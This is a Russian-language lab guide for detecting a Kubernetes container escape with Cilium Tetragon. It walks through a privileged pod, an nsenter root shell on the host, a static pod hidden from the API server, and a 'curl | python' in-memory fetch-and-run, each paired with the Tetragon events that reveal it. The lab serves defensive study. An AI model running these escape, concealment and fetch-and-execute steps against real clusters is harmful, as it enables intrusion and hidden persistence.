# Лабораторная работа для проекта Tetragon

## Запустим minikube

Для старта k8s будет использован minikube и virtualbox
```
minikube config set driver virtualbox
minikube start
```
Проверяем доступность нод

```bash
kubectl get nodes
```

Далее, устанавливаем Cilium Tetragon:

```
helm repo add cilium https://helm.cilium.io
helm repo update
helm install tetragon cilium/tetragon -n kube-system -f tetragon.yaml --version 1.0.2
```

Cilium Tetragon запущен как набор демонов, который реализует логику eBPF для извлечения событий, подтверждающих безопасность, а также для фильтрации событий, агрегирования и экспорта во внешние сборщики событий.

Подождите, пока набор демонов Tetragon не будет успешно запущен.

```bash
kubectl rollout status -n kube-system ds/tetragon -w
```

Чтобы иметь возможность распознавать реальные сценарии атак нам понадобятся три стратегии отслеживания, которые мы будем применять при решении различных задач. Политика отслеживания - это настраиваемое пользователем определение пользовательских ресурсов (CARD) Kubernetes, которое позволяет отслеживать произвольные события в ядре и определять действия, которые необходимо предпринять при их совпадении.

Первая политика отслеживания будет использоваться для мониторинга сетевых событий и отслеживания сетевых подключений. В нашем случае мы будем наблюдать за функциями tcp_connect, tcp_close и kernel, чтобы отслеживать, когда TCP-соединение открывается и закрывается соответственно:

```bash
kubectl apply -f networking.yaml
```
Теперь вы можете приступить к наблюдению событий безопасности, выполнив следующую команду:
```bash
kubectl exec -n kube-system -ti daemonset/tetragon -c tetragon -- \
    tetra getevents -o compact
```

Как вы видите, со временем появляется множество событий. Мы рассмотрим их подробнее в следующем шаге.
Настройка мониторинга событий безопасности завершена. 

## Обнаружение утечки из контейнера

В этой лабораторной работе мы рассмотрим первую часть реальной атаки и научимся, как шаг за шагом обнаруживать утечку из контейнера. Во время атаки мы воспользуемся привелегированым подом, чтобы войти во все пространства имен хостов с помощью команды **nsenter**.

Оттуда мы создадим статический манифест Пода в каталоге /etc/kubernetes/manifests, который заставит kubelet запустить этот под. Здесь мы фактически используете ошибку Kubernetes, когда вы определяете пространство имен Kubernetes, которое не существует для вашего статического Пода, что делает модуль невидимым для сервера API Kubernetes. Это делает ваш скрытный под невидимым для команд kubectl.

После сохранения взлома путем создания невидимого контейнера мы загрузим и запустим вредоносный скрипт в память, который никогда не коснется диска. Обратите внимание, что этот простой скрипт на python представляет собой вредоносное ПО без файлов, которое практически невозможно обнаружить с помощью традиционных инструментов пользовательского пространства.

Самый простой способ выполнить экранирование контейнера - запустить модуль с параметром "privileged" в спецификации модуля. Kubernetes разрешает это по-умолчанию, а флаг privileged предоставляет контейнеру все возможности Linux и доступ к пространствам имен хостов. Флаги **hostPID** и **hostNetwork** запускают контейнер в пространствах имен host PID и networking соответственно, поэтому он может напрямую взаимодействовать со всеми процессами и сетевыми ресурсами на узле.

### Запуск Пода в привелегированом режиме

Запустите два терминала bash

В Терминал 1 запустите проверку событий, связанных с возможностью наблюдения за безопасностью. На этот раз мы будем специально искать события, связанные с модулем под названием sith-infiltrator, в котором будет выполнена атака.
```bash
kubectl exec -n kube-system -ti daemonset/tetragon -c tetragon \
  -- tetra getevents -o compact --pods sith-infiltrator
```

Теперь давайте переключим на Terminal 2 и применим манифест привилегированного Пода:
```bash
kubectl apply -f sith-infiltrator.yaml
```

Подождите, пока он не будет готов:

```bash
kubectl get pods
```
На выходе должно быть:
```bash
NAME               READY   STATUS    RESTARTS   AGE
sith-infiltrator   1/1     Running   0          16s
```

В Терминале 1 вы можете идентифицировать запуск контейнера *sith-infiltrator* в пространстве имен Kubernetes *default* с помощью следующих событий **process_exec** и **process_exit**, генерируемых Cilium Tetragon:

```
process default/sith-infiltrator /docker-entrypoint.sh /docker-entrypoint.sh nginx -g "daemon off;" 🛑 CAP_SYS_ADMIN
🚀 process default/sith-infiltrator /usr/bin/find /docker-entrypoint.d/ -mindepth 1 -maxdepth 1 -type f -print -quit 🛑 CAP_SYS_ADMIN
[...]
💥 exit    default/sith-infiltrator /docker-entrypoint.d/20-envsubst-on-templates.sh /docker-entrypoint.d/20-envsubst-on-templates.sh 0 🛑 CAP_SYS_ADMIN
💥 exit    default/sith-infiltrator /usr/bin/basename /docker-entrypoint.d/30-tune-worker-processes.sh 0 🛑 CAP_SYS_ADMIN
💥 exit    default/sith-infiltrator /docker-entrypoint.d/30-tune-worker-processes.sh /docker-entrypoint.d/30-tune-worker-processes.sh 0 🛑 CAP_SYS_ADMIN
```

Если вы заглянете в несколько строк, то сможете ознакомиться со сценарием /docker-entrypoint.sh shell в качестве точки входа, которая запускает демон nginx:

```
🚀 process default/sith-infiltrator /docker-entrypoint.sh /docker-entrypoint.sh nginx -g "daemon off;" 🛑 CAP_SYS_ADMIN
```

Вы можете просмотреть изменения в файле конфигурации по умолчанию для демона nginx:

```
🚀 process default/sith-infiltrator /bin/grep -q "listen  \[::]\:80;" /etc/nginx/conf.d/default.conf 🛑 CAP_SYS_ADMIN
🚀 process default/sith-infiltrator /usr/bin/dpkg-query --show --showformat=${Conffiles}\n nginx 🛑 CAP_SYS_ADMIN
💥 exit    default/sith-infiltrator /usr/bin/touch /etc/nginx/conf.d/default.conf 0 🛑 CAP_SYS_ADMIN
🚀 process default/sith-infiltrator /bin/grep etc/nginx/conf.d/default.conf 🛑 CAP_SYS_ADMIN
💥 exit    default/sith-infiltrator /bin/grep -q "listen  \[::]\:80;" /etc/nginx/conf.d/default.conf 1 🛑 CAP_SYS_ADMIN
```

Наконец, мы можем увидеть, что двоичный файл /usr/bin/nginx запущен и прослушивается на порту 80:

```
🚀 process default/sith-infiltrator /bin/sed -i -E "s,listen       80;,listen       80;\n    listen  [::]:80;," /etc/nginx/conf.d/default.conf 🛑 CAP_SYS_ADMIN
...
🚀 process default/sith-infiltrator /usr/sbin/nginx -g "daemon off;" 🛑 CAP_SYS_ADMIN
```

Поскольку в спецификации модуля для флага privileged было установлено значение true, модуль получил все возможности Linux. В качестве примера, CAP_SYS_ADMIN печатается в конце каждого события проверки безопасности. CAP_SYS_ADMIN предоставляет высокоприоритетный уровень доступа, эквивалентный доступу root, он позволяет выполнять ряд операций системного администрирования: mount(2), umount(2), pivot_root(2), sethostname(2), setdomainname(2), setns(2), unshare(2) и т.д.

### Добавьте политику отслеживания для наблюдения за повышением привилегий

Чтобы иметь возможность обнаружить повышение привилегий из книги, нам нужно будет применить вторую политику отслеживания. Эта политика отслеживания будет отслеживать системный вызов sys-setns, который используется процессами при изменении пространств имен ядра. В Terminal 2 примените политику отслеживания:

```
kubectl apply -f sys-setns.yaml
```

Теперь давайте используем Terminal 2 и kubectl exec, чтобы запустить bash в sith-infiltrator:
```bash
kubectl exec -it sith-infiltrator -- /bin/bash
```
В терминале 1 теперь вы можете наблюдать за выполнением kubectl со следующим событием process_exec:
```bash
🚀 process default/sith-infiltrator /bin/bash            🛑 CAP_SYS_ADMIN
```
В Terminal 2 в нашей оболочке kubectl давайте используем команду nsenter для ввода пространства имен хоста и запустим bash от имени root на хосте:
```bash
nsenter -t 1 -a bash
```
Команда *nsenter* выполняет команды в указанных пространствах имен. Первый флаг, -t, определяет целевое пространство имен, в которое будет отправлена команда. На каждой машине Linux выполняется процесс с PID 1, который всегда выполняется в пространстве имен хоста. Другие аргументы командной строки определяют другие пространства имен, в которые также требуется ввести команду, в данном случае -a описывает все пространства имен Linux, а именно: cgroup, ipc, uts, net, pid, mnt, time.

Итак, мы выходим из контейнера всеми возможными способами и запускаем команду bash от имени root на хосте.

Мы можем идентифицировать привелегированый контейнер, наблюдая за двумя событиями process_exec и семью событиями process_kprobe во втором терминале. Первое событие process_exec - это команда nsenter с аргументами командной строки пространства имен:

```
🚀 process default/sith-infiltrator /usr/bin/nsenter -t 1 -a bash
```

Следующие семь событий process_kprobe описывают системный вызов sys-setns, который вызывался каждый раз, когда происходило изменение пространства имен ядра. Это показывает, как мы вошли в пространства имен cgroup, ipc, uts, net, pid, mnt, time host.
```bash
🔧 setns   default/sith-infiltrator /usr/bin/nsenter cgroup       🛑 CAP_SYS_ADMIN
🔧 setns   default/sith-infiltrator /usr/bin/nsenter ipc          🛑 CAP_SYS_ADMIN
🔧 setns   default/sith-infiltrator /usr/bin/nsenter uts          🛑 CAP_SYS_ADMIN
🔧 setns   default/sith-infiltrator /usr/bin/nsenter net          🛑 CAP_SYS_ADMIN
🔧 setns   default/sith-infiltrator /usr/bin/nsenter pid          🛑 CAP_SYS_ADMIN
🔧 setns   default/sith-infiltrator /usr/bin/nsenter mnt          🛑 CAP_SYS_ADMIN
🔧 setns   default/sith-infiltrator /usr/bin/nsenter time         🛑 CAP_SYS_ADMIN
```
Наблюдая за вторым событием process_exec, мы можем обнаружить выполнение bash в пространстве имен хоста с nsenter в качестве родительского процесса:
```bash
🚀 process default/sith-infiltrator /bin/bash            🛑 CAP_SYS_ADMIN
```
Теперь, когда мы запускаем команду bash от имени пользователя root на хосте, следующим шагом будет закрепление на узле и сокрытие любых следов нашей деятельности!

## Создание точки входа

На втором этапе мы можем попытаться создать точку входа и постоянный запуск контейнера на узле. Поскольку у нас есть неограниченный доступ к ресурсам узла, мы можем отказаться от пользовательской скрытой спецификации podspec и запустить невидимый ipod!

### Tracing Policy

Cilium Tetragon предоставляет платформу для обеспечения соблюдения правил, называемую Политикой трассировки. Политика трассировки - это настраиваемое пользователем определение пользовательских ресурсов (CARD) Kubernetes, которое позволяет отслеживать произвольные события в ядре и определять действия, которые необходимо предпринять в случае совпадения.

Политика трассировки полностью поддерживает идентификацию Kubernetes, поэтому она может применяться к произвольным событиям ядра и системным вызовам после того, как модуль достигнет состояния готовности. Это позволяет предотвратить системные вызовы, которые требуются во время выполнения контейнера, но должны быть ограничены во время выполнения приложения. Вы также можете внести изменения в политику трассировки, которые динамически обновляют программы eBPF в ядре без необходимости перезапуска вашего приложения или узла.

Как только происходит событие, вызванное политикой отслеживания и соответствующей сигнатурой, вы можете либо отправить предупреждение аналитику по безопасности, либо предотвратить такое поведение с помощью сигнала SIGKILL для процесса.

### Добавление Tracing Policy для определения невидимых Pods 

Чтобы иметь возможность обнаружить создание невидимого POD, нам нужно будет применить третью политику отслеживания. Эта политика отслеживания будет использоваться для мониторинга доступа на чтение и запись к конфиденциальным файлам. В нашем случае мы будем наблюдать за системными вызовами __x64_sys_write и __x64_sys_read, которые выполняются для файлов в каталоге /etc/kubernetes/manifests. В Terminal 2 примените манифест:

```bash
kubectl apply -f sys-write-etc-kubernetes-manifests.yaml
```
### Созадем невидимый для *kubeclt* Pod

Теперь давайте попробуем создать привелегированый контейнер на узле. Сначала в Терминале 1 давайте отследим сгенерированные события безопасности, как мы делали раньше.

```bash
kubectl exec -n kube-system -ti daemonset/tetragon -c tetragon -- \
  tetra getevents -o compact --pods sith-infiltrator
```

В Терминале 2 давайте запустим kubectl exec в sith-infiltrator:

```bash
kubectl exec -it sith-infiltrator -- /bin/bash
```
а затем снова войдите команду:

```
nsenter -t 1 -a bash
```

Теперь, когда у вас есть неограниченный доступ к ресурсам узла, давайте заглянем в каталог /etc/kubernetes/manifests и проверим существующее содержимое:

```bash
cd /etc/kubernetes/manifests/
ls -la
```

Вывод:
```
bash-5.0# cd /etc/kubernetes/manifests/
bash-5.0# ls -la
total 16
drwxr-xr-x 2 root root  120 Apr  7 09:42 .
drwxr-xr-x 4 root root  160 Apr  7 09:42 ..
-rw------- 1 root root 2482 Apr  7 09:42 etcd.yaml
-rw------- 1 root root 3642 Apr  7 09:42 kube-apiserver.yaml
-rw------- 1 root root 2951 Apr  7 09:42 kube-controller-manager.yaml
-rw------- 1 root root 1441 Apr  7 09:42 kube-scheduler.yaml
```

#### Созадем под
```bash
cat << EOF > hack-latest.yaml
apiVersion: v1
kind: Pod
metadata:
  name: hack-latest
  hostNetwork: true
  # define in namespace that doesn't exist so
  # workload is invisible to the API server
  namespace: doesnt-exist
spec:
  containers:
  - name: hack-latest
    image: sublimino/hack:latest
    command: ["/bin/sh"]
    args: ["-c", "while true; do sleep 10;done"]
    securityContext:
      privileged: true
EOF
```

В качестве проверки давайте запустим ps правильно и увидим, что на узле запущен новый контейнер с hack-latest. Обратите внимание, что для отображения контейнера с hack-latest может потребоваться несколько секунд:

```bash
crictl ps
```

Как только он запустится, выходные данные должны выглядеть следующим образом, среди прочих строк:

```bash
CONTAINER           IMAGE                                                                                                         CREATED             STATE               NAME                      ATTEMPT             POD ID              POD
f301b7c8d1ec0       sublimino/hack@sha256:569f3fd3a626a4cfd50e4556425216a5b8ab3d8bf9476c1b1c615b83ffe4000a                        22 seconds ago      Running             hack-latest               0                   aa38c8fd9769c       hack-latest-minikube
8373ccf87cb96       nginx@sha256:6db391d1c0cfb30588ba0bf72ea999404f2764febf0f1f196acd5867ac7efa7e                                 36 minutes ago      Running             sith-infiltrator          0                   5cc59f5adbf25       sith-infiltrator
442a395262a64       quay.io/cilium/tetragon@sha256:5ad7eee8e1c0bd1e6a079014f02abd8d568d2355be59ccb33972c67e13588e83               About an hour ago   Running             tetragon                  0                   9d822d6035f93       tetragon-w82hn
```

## Наблюдение за событиями безопасности

Теперь, когда вы записали свой cкрытый PodSpec в каталог kubelet, вы можете убедиться, что pod невидим для сервера API Kubernetes в Terminal 3, выполним:

```bash
kubectl get pods --all-namespaces
```

```
NAMESPACE     NAME                                 READY   STATUS    RESTARTS   AGE
default       sith-infiltrator                     1/1     Running   0          42m
kube-system   coredns-787d4945fb-q69t6             1/1     Running   0          107m
kube-system   etcd-minikube                        1/1     Running   0          107m
kube-system   kube-apiserver-minikube              1/1     Running   0          107m
kube-system   kube-controller-manager-minikube     1/1     Running   0          107m
kube-system   kube-proxy-t7qqc                     1/1     Running   0          107m
kube-system   kube-scheduler-minikube              1/1     Running   0          107m
kube-system   storage-provisioner                  1/1     Running   0          107m
kube-system   tetragon-operator-84bc49c776-4dfgk   1/1     Running   0          75m
kube-system   tetragon-w82hn                       2/2     Running   0          75m
```

Обратите внимание, что последнее сообщение о взломе контейнера не отображается в выходных данных!

Однако оно может быть идентифицировано с помощью Cilium Tetragon. Отслеживая события обеспечения безопасности с помощью Cilium Tetragon в Терминале 1, вы можете заблаговременно определить сохраняемость, обнаружив последнее сообщение о взломе. Это запись в файл yaml с помощью /usr/bin/cat в следующих событиях *process_exec* и *process_kprobe*:

```
🚀 process default/sith-infiltrator /bin/bash              🛑 CAP_SYS_ADMIN
🚀 process default/sith-infiltrator /usr/bin/nsenter -t 1 -a bash 🛑 CAP_SYS_ADMIN
🚀 process default/sith-infiltrator /usr/bin/bash          🛑 CAP_SYS_ADMIN
🚀 process default/sith-infiltrator /usr/bin/ls -la        🛑 CAP_SYS_ADMIN
📬 open    default/sith-infiltrator /usr/bin/ls /etc/kubernetes/manifests 🛑 CAP_SYS_ADMIN
💥 exit    default/sith-infiltrator /usr/bin/ls -la 0 🛑 CAP_SYS_ADMIN
📬 open    default/sith-infiltrator /usr/bin/bash /etc/kubernetes/manifests/hack-latest.yaml 🛑 CAP_SYS_ADMIN
🚀 process default/sith-infiltrator /usr/bin/cat           🛑 CAP_SYS_ADMIN
💥 exit    default/sith-infiltrator /usr/bin/cat  0 🛑 CAP_SYS_ADMIN
🚀 process default/sith-infiltrator /usr/bin/crictl ps     🛑 CAP_SYS_ADMIN
💥 exit    default/sith-infiltrator /usr/bin/crictl ps 0 🛑 CAP_SYS_ADMIN
```

## Пример запуска вредоносного скрипт на python в памяти

Мы сохранили возможность взлома, создав невидимый контейнер, теперь мы можем загружать и запускать вредоносный скрипт в памяти, который никогда не касается диска.

Для этого мы используем простой скрипт на python в качестве вредоносной программы без файлов, которую практически невозможно обнаружить с помощью традиционных инструментов пользовательского пространства.


### Запускаем скрипт

Теперь, когда вы действительно сохранили возможность взлома, создав невидимый контейнер, вы можете загрузить и запустить вредоносный скрипт в памяти, который никогда не коснется диска. Обратите внимание, что этот простой скрипт на python может быть вредоносной программой без файлов, которую практически невозможно обнаружить с помощью традиционных инструментов пользовательского пространства.

Во-первых, в Терминале 1 давайте отследим сгенерированные события наблюдаемости безопасности, как мы делали это раньше.

```bash
kubectl exec -n kube-system -ti daemonset/tetragon -c tetragon -- \
  tetra getevents -o compact --pods sith-infiltrator
```
В Терминале 3 давайте подключимся к sith-infiltrator:

```bash
kubectl exec -it sith-infiltrator -- /bin/bash
```
и сменим пространтво имен

```bash
nsenter -t 1 -a bash
```

Установим jq

```bash
curl -L https://github.com/jqlang/jq/releases/download/jq-1.7.1/jq-linux-amd64 -o /usr/bin/jq && chmod +x /usr/bin/jq
```

Поищем скрытый контейнер hack-latest

```
CONT_ID=$(crictl ps --name hack-latest --output json | jq -r '.containers[0].id')
echo $CONT_ID
```
В том же терминале 3 запустим crictl exec в невидимый контейнер:

```bash
crictl exec -it $CONT_ID /bin/bash
```
Вывод:
```bash
bash-5.0# crictl exec -it $CONT_ID /bin/bash
PRETTY_NAME="Alpine Linux v3.12"
root@hack-latest-minikube:~ [0]#
```

В журналах в Terminal 1 первое событие process_exec показывает выполнение bash в контейнере с идентификатором контейнера (например, 24220f07dacc), который является невидимым контейнером с hack-latest.

Обратите внимание, что из-за кольцевого буфера / задержки иногда может потребоваться несколько секунд, прежде чем появятся определенные сообщения журнала!

```
💥 exit    default/sith-infiltrator /bin/bash  0 🛑 CAP_SYS_ADMIN
...
🚀 process default/sith-infiltrator /usr/bin/crictl exec -it f301b7c8d1ec0193034b6351ad95725862436693f9f10d3cf8455cb0c8c71206 /bin/bash 🛑 CAP_SYS_ADMIN
```

Чтобы иметь возможность точно отслеживать события, связанные с безопасностью, из Cilium Tetragon, запустите мониторинг событий, которые соответствуют именам процессов curl или python, в Терминале 2:

```
kubectl exec -n kube-system -ti daemonset/tetragon -c tetragon -- \
  tetra getevents -o compact --processes curl,python
```

Затем в Терминале 3 загрузите вредоносный скрипт на python и запустите его в памяти:

```
curl https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py | python
```

### Смотрим события по безопасности

Используя Cilium Tetragon, вы сможете следить за завершением атаки.

Примерно через минуту в логах в Terminal 2 событие process_exec отображает команду sensitive curl с аргументами https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py :

Вы также можете идентифицировать конфиденциальное соединение с сокетом, открытое через curl, со следующим IP-адресом назначения 185.199.110.133 и портом 443:

```
🚀 process minikube /usr/bin/curl https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py 🛑 CAP_SYS_ADMIN
🚀 process minikube /usr/bin/python                        🛑 CAP_SYS_ADMIN
🔌 connect minikube /usr/bin/curl tcp 10.244.0.4:60816 -> 185.199.111.133:443 🛑 CAP_SYS_ADMIN
🧹 close   minikube /usr/bin/curl tcp 10.244.0.4:60816 -> 185.199.111.133:443 🛑 CAP_SYS_ADMIN
💥 exit    minikube /usr/bin/curl https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py 0 🛑 CAP_SYS_ADMIN
💥 exit    minikube /usr/bin/python  0            🛑 CAP_SYS_ADMIN
```

В то время как следующие события process_exit показывают, что выполнение вредоносного скрипта python в памяти завершено с кодом завершения 0, что означает, что оно прошло успешно (exit    minikube /usr/bin/python  0            🛑 CAP_SYS_ADMIN).
